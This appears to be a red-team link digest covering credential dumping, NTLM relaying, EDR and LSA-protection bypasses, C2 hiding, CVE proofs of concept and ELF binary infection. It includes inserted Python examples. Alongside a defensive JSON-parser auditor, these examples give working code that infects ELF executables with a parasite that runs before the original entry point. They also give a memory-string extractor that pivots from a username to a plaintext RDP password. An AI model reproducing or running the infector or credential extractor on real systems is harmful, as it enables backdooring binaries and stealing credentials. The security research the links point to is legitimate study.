An Excel-centric approach for managing the MITRE ATT&CK® tactics and techniques.
https://github.com/RealityNet/attack-coverage
The project-memoria-detector tool aims to determine whether a target network device runs a specific embedded TCP/IP stack.
https://github.com/Forescout/project-memoria-detector
Bypassing LSA Protection in Userland
https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/
Building on the Shoulders of Giants: Combining TensorFlow and Rust
https://www.crowdstrike.com/blog/how-crowdstrike-combines-tensorflow-and-rust-for-performance/
CrowdStrike's perspective on combining Rust and TensorFlow to improve both memory performance and speed.
Analysis of Chromium issue 1196683, 1195777
https://iamelli0t.github.io/2021/04/20/Chromium-Issue-1196683-1195777.html
On April 12, a code commit[1] in Chromium got people's attention. It is a bugfix for a vulnerability in V8, Chromium's JavaScript engine. The regression test case regress-1196683.js for this bugfix was submitted at the same time. Based on this regression…
Remote Potato – From Domain User to Enterprise Admin
https://pentestlab.blog/2021/05/04/remote-potato-from-domain-user-to-enterprise-admin/
NTLM relaying is a well-known technique, mainly used in security assessments to establish some sort of foothold on a server in the network or for privilege escalation scenari…
This repo contains information about EDRs that can be useful during red team exercises.
https://github.com/Mr-Un1k0d3r/EDRs
Domain Borrowing is a new method to hide C2 traffic behind a CDN (PoC).
https://github.com/Dliv3/DomainBorrowing
CVE-2021-31166: proof of concept for a remotely triggered use-after-free in HTTP.sys.
https://github.com/0vercl0k/CVE-2021-31166
Credential Dumping cheatsheet
https://dl.packetstormsecurity.net/papers/general/credential_dumping.pdf
Dumping Plaintext RDP credentials from svchost.exe
https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
Recently I was browsing Twitter and came across a very interesting tweet: A simple string search within the process memory for svchost.exe revealed the plaintext password that was used to connect to the system via RDP. After some testing, I was also able…
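The string search the post describes, as an added example that is not part of the post or its author's tooling: a small Python extractor for ASCII and UTF-16LE strings (Windows keeps most credential material as wide strings) run over a constructed byte blob that stands in for an svchost.exe memory dump. The planted username, password and address are made up, and the neighbours() pivot on the username is this example's own idea, not a claim about how the post located the password.

```python
# Added example (not n00py's code): "strings" over a process memory image,
# with UTF-16LE support, plus a pivot from a known username to nearby strings.
import re


def extract_strings(blob, min_len=6):
    """Return [(offset, encoding, text)] for every printable ASCII and UTF-16LE run."""
    hits = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob):
        hits.append((m.start(), "ascii", m.group().decode("ascii")))
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, blob):
        hits.append((m.start(), "utf-16le", m.group().decode("utf-16le")))
    return sorted(hits)           # by offset, so neighbours in the list are neighbours in memory


def neighbours(strings, pattern, window=2):
    """Strings within `window` positions of any string matching `pattern`.
    Session data tends to sit close together, so a known value (the username)
    is a cheap pivot for spotting the secret stored next to it."""
    rx = re.compile(pattern)
    out = []
    for i, (_, _, text) in enumerate(strings):
        if rx.search(text):
            lo, hi = max(0, i - window), min(len(strings), i + window + 1)
            for s in strings[lo:hi]:
                if s not in out:
                    out.append(s)
    return out


def build_sample_dump():
    """Constructed memory image (not a real dump): non-printable filler with a few planted strings."""
    filler = bytes([0x00, 0xFF, 0x13, 0x80]) * 64
    wide = lambda s: s.encode("utf-16le") + b"\x00\x00"   # NUL-terminated wide string
    return (filler + b"TermService\x00" + filler + wide("CORP\\alice") + filler[:8]
            + wide("Hunter2-Summer!") + filler[:8] + wide("10.0.0.5") + filler)


if __name__ == "__main__":
    found = extract_strings(build_sample_dump())
    for off, enc, text in found:
        print(f"{off:#08x} {enc:9} {text}")
    print("around the username:", [t for _, _, t in neighbours(found, r"\\alice$")])
```

On a real dump the interesting part is the wide strings: an ASCII-only strings run misses them entirely, which is why the extractor handles both encodings.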
An Exploration & Remediation of JSON Interoperability Vulnerabilities
https://labs.bishopfox.com/tech-blog/an-exploration-of-json-interoperability-vulnerabilities
How the same JSON document can be parsed to different values by different microservices, leading to a variety of security risks.
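An added example (not Bishop Fox's code): the same constructed document read by a last-wins parser and by a parser that stores numbers as doubles, next to a strict loader that refuses the two classic divergence points, duplicate keys and integers beyond 2**53. The function names are this example's own.

```python
# Added example: one JSON document, two readings, and a loader that refuses
# documents other services might interpret differently.
import json

SAFE_INT = 2 ** 53   # above this a double (JavaScript's only number type) rounds


def audit_json(text):
    """Return human-readable findings for constructs that parsers disagree on."""
    findings = []

    def pairs_hook(pairs):           # called for every object, innermost first
        obj = {}
        for key, value in pairs:
            if key in obj:
                findings.append(f"duplicate key {key!r}: first={obj[key]!r}, last={value!r}")
            obj[key] = value         # last wins here, exactly like plain json.loads
        return obj

    def parse_int(token):
        n = int(token)
        if abs(n) > SAFE_INT:
            findings.append(f"integer {token} is not exactly representable as a double "
                            f"(a JS-style parser reads {float(n):.0f})")
        return n

    json.loads(text, object_pairs_hook=pairs_hook, parse_int=parse_int)
    return findings


def strict_loads(text):
    """Hardened entry point: raise instead of silently picking one interpretation."""
    findings = audit_json(text)
    if findings:
        raise ValueError("; ".join(findings))
    return json.loads(text)


def last_wins_loads(text):
    """Python's default: the last of two duplicate keys is kept (other parsers keep the first)."""
    return json.loads(text)


def double_loads(text):
    """Model a parser that stores every number as a double, e.g. JSON.parse."""
    return json.loads(text, parse_int=float)


if __name__ == "__main__":
    # Constructed order document: one service sees qty=1, another qty=-1,
    # and the id silently changes value in a double-based service.
    doc = '{"item": "sku-1", "qty": 1, "qty": -1, "id": 9007199254740993}'
    print("last-wins qty:", last_wins_loads(doc)["qty"])
    print("double id:    ", double_loads(doc)["id"])
    print("findings:     ", audit_json(doc))
```

The strict loader belongs at the edge of the system, before the document is forwarded: once two services have each applied their own parser, there is no longer one document to reason about.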
How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying Attacks
https://www.praetorian.com/blog/how-to-exploit-active-directory-acl-attack-paths-through-ldap-relaying-attacks/
This article describes methods by which an attacker can induce a victim user into authenticating with the NT LAN Manager (NTLM) authentication protocol to an attacker-controlled “Intranet” site, even in instances where that site points to an external…
Fuzzing exotic arch with AFL using ghidra emulator
https://airbus-cyber-security.com/fuzzing-exotic-arch-with-afl-using-ghidra-emulator/
Know Your Enemy: Exploiting the Dell BIOS Driver Vulnerability (CVE-2021-21551) to Defend Against It
https://www.crowdstrike.com/blog/cve-2021-21551-learning-through-exploitation/
Using CVE-2021-21551 as an example, learn how adversaries approach weaponizing vulnerabilities, and the technologies that work best to mitigate their tactics.
Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug (CVE-2021-3560)
https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
polkit is a system service installed by default on many Linux distributions. It’s used by systemd, so any Linux distribution that uses systemd also uses polkit.
d0zer
ELF binary infector written in Go. It can be used to infect executables of type ET_DYN and ET_EXEC with a payload of your creation. Using the classic ELF text segment padding algorithm by Silvio Cesare, your payload (parasite) runs before the binary's native functionality, effectively backdooring the binary.
https://github.com/sad0p/d0zer
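The text segment padding algorithm in Python, as an added example (d0zer itself is written in Go and this is not its code): a constructed two-segment ELF64 is infected by appending the parasite to the executable PT_LOAD segment, shifting everything behind it by one page, and pointing e_entry at the parasite, which ends in a JMP back to the original entry point. It assumes x86-64 and page-aligned segments (p_align of 0x1000); the sample binary, field-index constants and helper names are this example's own.

```python
# Added example (not d0zer's code): Silvio Cesare's text-segment padding
# infection applied to a constructed minimal ELF64 so it runs offline.
import struct

PAGE = 0x1000                                # the algorithm assumes page-aligned segments
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")    # Elf64_Ehdr, 64 bytes
PHDR = struct.Struct("<IIQQQQQQ")            # Elf64_Phdr, 56 bytes
SHDR = struct.Struct("<IIQQQQIIQQ")          # Elf64_Shdr, 64 bytes
PT_LOAD, PF_X = 1, 1
# field positions in the unpacked tuples (this example's own naming)
E_ENTRY, E_PHOFF, E_SHOFF, E_PHNUM, E_SHNUM = 4, 5, 6, 10, 12
P_TYPE, P_FLAGS, P_OFFSET, P_VADDR, P_FILESZ, P_MEMSZ, P_ALIGN = 0, 1, 2, 3, 5, 6, 7
SH_OFFSET = 4


def build_sample_elf():
    """Constructed input (not a real binary): ET_EXEC x86-64 with an R+X text
    segment at file offset 0 and an R+W data segment one page later. The only
    code is a RET at offset 0x100, which is also the entry point."""
    text = bytearray(0x200)
    text[0x100] = 0xC3
    ident = b"\x7fELF" + bytes([2, 1, 1, 0, 0]) + bytes(7)   # ELFCLASS64, little endian
    text[:64] = EHDR.pack(ident, 2, 0x3E, 1, 0x400100, 64, 0, 0, 64, 56, 2, 64, 0, 0)
    text[64:176] = (PHDR.pack(PT_LOAD, 5, 0, 0x400000, 0x400000, 0x200, 0x200, PAGE)
                    + PHDR.pack(PT_LOAD, 6, PAGE, 0x601000, 0x601000, 0x100, 0x100, PAGE))
    return bytes(text) + bytes(PAGE - 0x200) + b"D" * 0x100


def parse(elf):
    """Return (ehdr fields, [phdr fields]) as mutable lists."""
    hdr = list(EHDR.unpack_from(elf, 0))
    phdrs = [list(PHDR.unpack_from(elf, hdr[E_PHOFF] + i * PHDR.size))
             for i in range(hdr[E_PHNUM])]
    return hdr, phdrs


def infect(elf, parasite):
    """Append `parasite` to the end of the executable segment and make it the entry point."""
    hdr, phdrs = parse(elf)
    text = next(p for p in phdrs if p[P_TYPE] == PT_LOAD and p[P_FLAGS] & PF_X)
    insert_off = text[P_OFFSET] + text[P_FILESZ]     # end of text in the file
    parasite_vaddr = text[P_VADDR] + text[P_FILESZ]  # where the loader will map it
    if hdr[E_PHOFF] + hdr[E_PHNUM] * PHDR.size > insert_off:
        raise ValueError("program headers must sit inside the text segment")

    # the parasite hands control back with an x86-64 JMP rel32 to the original entry
    jmp_end = parasite_vaddr + len(parasite) + 5
    body = parasite + b"\xE9" + struct.pack("<i", hdr[E_ENTRY] - jmp_end)
    if len(body) > PAGE:
        raise ValueError("parasite does not fit in one page of padding")

    # insert exactly one page so every later offset stays congruent with its vaddr
    out = bytearray(elf[:insert_off] + body + bytes(PAGE - len(body)) + elf[insert_off:])

    text[P_FILESZ] += len(body)      # text segment now covers the parasite
    text[P_MEMSZ] += len(body)
    for p in phdrs:                  # segments behind the insertion point move down a page
        if p is not text and p[P_OFFSET] >= insert_off:
            p[P_OFFSET] += PAGE
    if hdr[E_SHOFF] >= insert_off:   # section header table too (0 means no sections)
        hdr[E_SHOFF] += PAGE
    for i in range(hdr[E_SHNUM]):    # and every section body behind the insertion point
        off = hdr[E_SHOFF] + i * SHDR.size
        sh = list(SHDR.unpack_from(out, off))
        if sh[SH_OFFSET] >= insert_off:
            sh[SH_OFFSET] += PAGE
        SHDR.pack_into(out, off, *sh)
    hdr[E_ENTRY] = parasite_vaddr    # parasite runs before the original code

    EHDR.pack_into(out, 0, *hdr)
    for i, p in enumerate(phdrs):
        PHDR.pack_into(out, hdr[E_PHOFF] + i * PHDR.size, *p)
    return bytes(out)


def segments_congruent(elf):
    """Loader sanity check: every PT_LOAD must keep p_offset ≡ p_vaddr (mod p_align)."""
    _, phdrs = parse(elf)
    return all(p[P_OFFSET] % p[P_ALIGN] == p[P_VADDR] % p[P_ALIGN]
               for p in phdrs if p[P_TYPE] == PT_LOAD and p[P_ALIGN])


if __name__ == "__main__":
    original = build_sample_elf()
    infected = infect(original, b"\x90\x90\x90")          # three NOPs as the payload
    hdr, phdrs = parse(infected)
    print(f"entry {hdr[E_ENTRY]:#x}, text filesz {phdrs[0][P_FILESZ]:#x}, "
          f"data at {phdrs[1][P_OFFSET]:#x}, congruent={segments_congruent(infected)}")
```

The congruence check is the one to run on any infected output: a segment whose file offset and virtual address no longer agree modulo the alignment is refused by the kernel loader, which is exactly what shifting by a whole page avoids.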
A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.
https://github.com/optiv/Dent
DarkLoadLibrary (Bypassing Image Load Kernel Callbacks): LoadLibrary for offensive operations.
https://github.com/bats3c/DarkLoadLibrary